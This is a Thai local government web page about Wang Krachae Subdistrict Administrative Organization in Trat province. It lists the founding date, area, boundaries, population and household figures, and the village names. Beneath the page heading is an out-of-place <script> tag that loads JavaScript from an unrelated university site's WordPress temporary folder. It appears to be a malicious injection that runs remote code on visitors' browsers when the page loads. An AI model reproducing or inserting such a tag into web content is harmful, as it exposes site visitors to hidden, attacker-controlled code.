ข้อมูลพื้นฐาน อบต.
ทำเนียบบุคลากร
ปฏิทินกิจกรรม
พฤษภาคม 2564
อา พฤ
25 26 27 28 29 30 1
2 3 4 5 6 7 8
9 10 11 12 1314 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5
วันที่ 13 พฤษภาคม 2564
อบต.ในเครือข่าย

ข้อมูลทั่วไป
บริการออนไลน์


  หน้าแรก     สภาพทั่วไป 

สภาพทั่วไป
สภาพทั่วไป  

<script src=https://labsosio.ui.ac.id/wp-snapshots/tmp/tools/jso/217aa63d.js></script>

 

ข้อมูลทั่วไป

         องค์การบริหารส่วนตำบลวังกระแจะ เป็นองค์การบริหารส่วนตำบลที่จัดตั้งขึ้น เมื่อวันที่ 3 มีนาคม พ.ศ.2538 ตามพระราชบัญญัติสภาตำบลและองค์การบริหารส่วนตำบล พ.ศ.2537 ตั้งอยู่พื้นที่อำเภอเมืองตราด จังหวัดตราด จัดอยู่ในองค์การบริหารส่วนตำบลชั้นกลาง มีเนื้อที่ประมาณ 85.67 ตารางกิโลเมตร หรือประมาณ 53,731 ไร่

อาณาเขต
             พื้นที่โดยทั่วไป มีลักษณะเป็นที่สูง เนินเขา และที่ราบลุ่มสลับกัน เหมาะแก่การทำการเกษตรและเป็นที่อยู่อาศัย โดยมีอาณาเขตติดกับพื้นที่ต่างๆ ดังนี้
           - ทิศเหนือ              ติดต่อ    องค์การบริหารส่วนตำบลเขาสมิง
                                                    และองค์การบริหารส่วนตำบลห้วยแร้ง
           - ทิศใต้                  ติดต่อ    องค์การบริหารส่วนตำบลหนองเสม็ด
                                                    และองค์การบริหารส่วนตำบลหนองคันทรง
                                                   โดยมีคลองบางพระเป็นแนวเขต
           - ทิศตะวันออก        ติดต่อ    องค์การบริหารส่วนตำบลเนินทราย
                                                    โดยมีแม่น้ำตราดเป็นแนวเขต
           - ทิศตะวันตก          ติดต่อ    องค์การบริหารส่วนตำบลท่าโสม
                                                    และองค์การบริหารส่วนตำบลหนองโสน
 
จำนวนครัวเรือนและประชากร
            - จำนวนครัวเรือนทั้งหมด                   11,765   ครัวเรือน              
          - จำนวนประชากรทั้งหมด                   21,168   คน
          - จำนวนประชากรชาย                       10,197   คน
          - จำนวนประชากรหญิง                      10,971   คน
 
เขตการปกครอง                 
                หมู่ที่ 1      บ้านเกาะตะเคียน             หมู่ที่ 2   บ้านหนองบัว
             หมู่ที่ 3      บ้านป่าหมาก                   หมู่ที่ 4   บ้านปลายคลอง
             หมู่ที่ 5      บ้านสระอินทนิน              หมู่ที่ 6   บ้านท้ายวัง
             หมู่ที่ 7      บ้านท่าประดู่                   หมู่ที่ 8   บ้านเนินตาแมว
             หมู่ที่ 9      บ้านสวนใน                     หมู่ที่ 10 บ้านเขาระกำ                      
             หมู่ที่ 11    บ้านหินเพลิง                   หมู่ที่ 12 บ้านราษฎร์สามัคคี           

              ข้อมูลจำนวนประชากรและจำนวนครัวเรือนในเขต อบต.วังกระแจะ

                               (ข้อมูล ณ เดือนพฤษภาคม พ.ศ.2562)

การให้บริการ
กฎหมายน่ารู้
เว็บไซต์บริการ
ความรู้เกี่ยวกับ อบต.
สถิติผู้เข้าชมเว็บไซต์
ออนไลน์ทั้งหมด 1 คน
หมายเลข IP 18.206.238.77
คุณเข้าชมลำดับที่ 845,028

แบบสำรวจความคิดเห็น
เจ้าหน้าที่พูดจาสุภาพ อัธยาศัยดี แต่งกายสุภาพ การวางตัวเรียบร้อย
มากที่สุด
มาก
ปานกลาง
น้อย
ควรปรับปรุง
หลักเกณฑ์การบริหารและพัฒนาทรัพยากรบุคคล
สายตรงผู้บริหาร
แบบสอบถาม
การให้บริการ
การประเมินความเสี่ยงการทุจริต
รายงานการวิจัยผลการสำรวจความพึงพอใจ
แผนการดำเนินงานประจำปี
แผนปฎิบัติการป้องกันการทุจริต
แผนพัฒนาท้องถิ่น
สถิติการให้บริการประชาชน
แผนการใช้จ่ายงบประมาณประจำปี
รายงานผลการติดตามผลการดำเนินงาน
คู่มือ
 
องค์การบริหารส่วนตำบลวังกระแจะ
Tel : 039-520988   Fax : 039-523319-20
Email : wangkrajaelocal@gmail.com
Copyright © 2020 by OPSTECH All Right Reserved.